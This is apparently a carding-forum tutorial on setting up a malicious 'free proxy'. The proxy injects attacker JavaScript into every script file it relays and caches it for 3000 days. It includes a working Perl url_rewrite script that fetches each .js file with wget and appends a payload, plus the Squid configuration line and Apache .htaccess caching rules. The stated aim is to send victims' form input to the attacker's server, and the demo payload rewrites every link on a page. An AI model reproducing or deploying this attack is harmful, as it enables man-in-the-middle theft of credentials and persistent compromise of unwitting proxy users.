Carder.life - Infect Users By Offering a Free Proxy

Everything is done via a stock SQUID proxy with small config changes.
The idea is pretty simple:
1. [Server] Install Squid on a linux server
2. [Payload] Modify the server so all transmitted javascript files will get one extra piece of code that does things like send all data entered in forms to your server
3. [Cache] Set the caching time of the modified .js files as high as possible
https
This technique also works with https if the site loads unsafe resources (eg. jquery from a http site). Most browsers will tell you that, some might even block the content but usually nobody gives attention to the "lock" symbol.
In a presentation at DefCon Chema Alonso said he posted the IP of a modified server on the web and after a few days there were over 5000 people using his proxy. Most people used it for bad things because everyone knows you're only anonymous in the web when you've got a proxy and it looks like many people don't think that the proxy could do something bad to them.
Make your own js infecting proxy
I assume that you have a squid proxy running and also you'll need a webserver like Apache using /var/www as web root directory (which is the default)
Step 1: Create a payload
For the payload I'll use a simple script that takes all links of a webpage and rewrites the href (link) attribute to KrebsOnSecurity.
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 34px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">/etc/squid/payload.js</pre>
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 50px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">for(var i=0;i<document.getElementsByTagName('a').length ;i++)
document.getElementsByTagName('a')[i].href = "https://krebsonsecurity.com";</pre>
Step 2: Write the script that poisons all requested .js files
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 418px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">/etc/squid/poison.pl
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while(<>)
{
chomp $_;
if($_ =- /(.*\.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
print "http://127.0.0.1:80/tmp/$pid-$count.js\n";
}
else
{
print "$_\n";
}
$count++;
}</pre>
This script uses wget to retrieve the original javascript file of the page the client asked for and adds the code from the /etc/squid/payload.js file to it. This modified file (which contains our payload now) will be sent to the client. You'll also have to create the folder /var/www/tmp and allow squid to write files in it. This folder is where all modified js scripts will be stored.
Step 3: Tell Squid to use the script above
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 34px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">in /etc/squid/squid.conf add</pre>
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 34px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">url_rewrite_program /etc/squid/poison.pl</pre>
Step 4: Never let the cache expire
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 82px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">/var/www/tmp/.htaccess
ExpiresActive On
ExpiresDefault "access plus 3000 days"</pre>
These lines tell the apache server to give it an insanely long expiration(caching) time so it will be in the browser of the user until they're cleaning their cookies/caches
One more restart of squid and you're good to go. If you're connecting to the proxy and try to surf on any webpage, the page will be displayed as expected but all links will lead to Brian Krebs blog. The sneaky thing about this technique is that even when somebody disconnects from the proxy the cached js files will most likely be still in their caches. In my example the payload does nothing too destructive and the user will know pretty fast that something is fishy but with creative payloads all sorts of things could be implemented.